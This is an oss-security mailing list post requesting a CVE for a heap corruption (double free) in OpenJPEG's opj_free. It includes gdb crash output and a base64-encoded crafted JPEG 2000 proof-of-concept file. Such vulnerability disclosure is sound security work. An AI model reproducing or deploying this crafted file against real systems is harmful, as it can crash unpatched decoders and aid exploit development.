oss-sec mailing list archives

CVE request - OpenJPEG : Heap Corruption in opj_free function


From: winsonliu(刘科) <winsonliu () tencent com>
Date: Mon, 14 Mar 2016 06:51:53 +0000

Hi all,

I found a vulnerability in OpenJPEG. The specific flaw exists within the opj_free function. A specially crafted JPEG 2000
image file can cause heap corruption in OpenJPEG. This issue can be reproduced in the latest version of
OpenJPEG (https://github.com/uclouvain/openjpeg, 2016.03.14).

Detailed information about this issue follows.
---------------------------------
winson@ubuntu:~/Desktop/repo/openjpeg/bin$ gdb opj_decompress -q
Reading symbols from opj_decompress...(no debugging symbols found)...done.

(gdb) r -o image.pgm -i heap_corruption.jp2 
Starting program: /home/winson/Desktop/repo/openjpeg/bin/opj_decompress -o image.pgm -i heap_corruption.jp2

[INFO] Start to read j2k main header (131).
[INFO] Main header has been correctly decoded.
[INFO] No decoded area parameters, set the decoded area to the whole image
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[INFO] Header of tile 1 / 1 has been read.
[INFO] Tile 1/1 has been decoded.
[INFO] Image data has been updated with tile 1.

[INFO] Stream reached its end !
WARNING -> [PGM file] Only the first component
           is written to the file
[INFO] Generated Outfile image.pgm
*** Error in `/home/winson/Desktop/repo/openjpeg/bin/opj_decompress': double free or corruption (!prev): 0x080e7a80 ***

Program received signal SIGABRT, Aborted.
0xb7fdccb0 in ?? ()

(gdb) bt
#0  0xb7fdccb0 in ?? ()
#1  0xb7df933a in malloc_printerr (action=<optimized out>, str=0xb7eebfd0 "double free or corruption (!prev)", 
ptr=0x80e7a80) at malloc.c:4996
#2  0xb7df9fad in _int_free (av=0xb7f30420 <main_arena>, p=<optimized out>, have_lock=0) at malloc.c:3840
#3  0xb7fc849a in opj_free () from /home/winson/Desktop/repo/openjpeg/bin/libopenjp2.so.7
#4  0xb7f98096 in opj_image_destroy () from /home/winson/Desktop/repo/openjpeg/bin/libopenjp2.so.7
#5  0x0804ca8e in main ()

(gdb) x /i $eip
=> 0xb7fdccb0: pop    %ebp

(gdb) i r 
eax            0x0 0
ecx            0x2d5d 11613
edx            0x6 6
ebx            0x2d5d 11613
esp            0xbfff9b94 0xbfff9b94
ebp            0xbfff9e58 0xbfff9e58
esi            0x78 120
edi            0xb7f30000 -1208811520
eip            0xb7fdccb0 0xb7fdccb0
eflags         0x246 [ PF ZF IF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0 0
gs             0x33 51


The attached file is the proof of concept.
Alternatively, decode the following string from base64 and save the decoded content to a .jp2 file.
---------------------------------
AAAADGpQICANCocKAAAAFGZ0eXBqcDIgAAAAAGpwMiAAAABbanAyaAAAABZpaGRyAAAAIAAAACAA
BP8HAAAAAAAMYnBjYwQEBAAAAAAPY29scgEAAAAAABgAAAAiY2RlZgAEAAAAAAACAAEAAAADAAIA
GQADAAMAAQAAAAABI2pwMmP/T/9RADIAAAAAACAAAAAgAAAAAAAAAAAAAAAgAAAAIAAAAAAAAAAA
AAQEDwEEAQEEAQEAAQH/UgAMAAAAAQEFBAQAAf9cABNAKDAwODAwODAwODAwODAwOP9kACUAAUNy
ZWF0ZWQgYnkgT3BlbkpQRUcgdmVyc2lvbiAyLjEuMP+QAAoAAAAAAJkAAf+TwQgDz4AQCcOBA4Ch
8AIEp8YIBr+vpBAJ18hAA6PjCAOXpU+vpCALHlIPoeDACzrXgKPkCgDP1Tx/p84cA3/dRtwif6fO
HAN/3VDyfH+AofCKPmKiqS6j5BI9pjRZ2Z4Nooaj4xA9pjRZ2Z4Nv4Cg6MCdlqj4G1+h8I6drClA
9VfWofCMnawpQPlngP/Z


CREDIT:
This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.

Attachment: heap_corruption.jp2
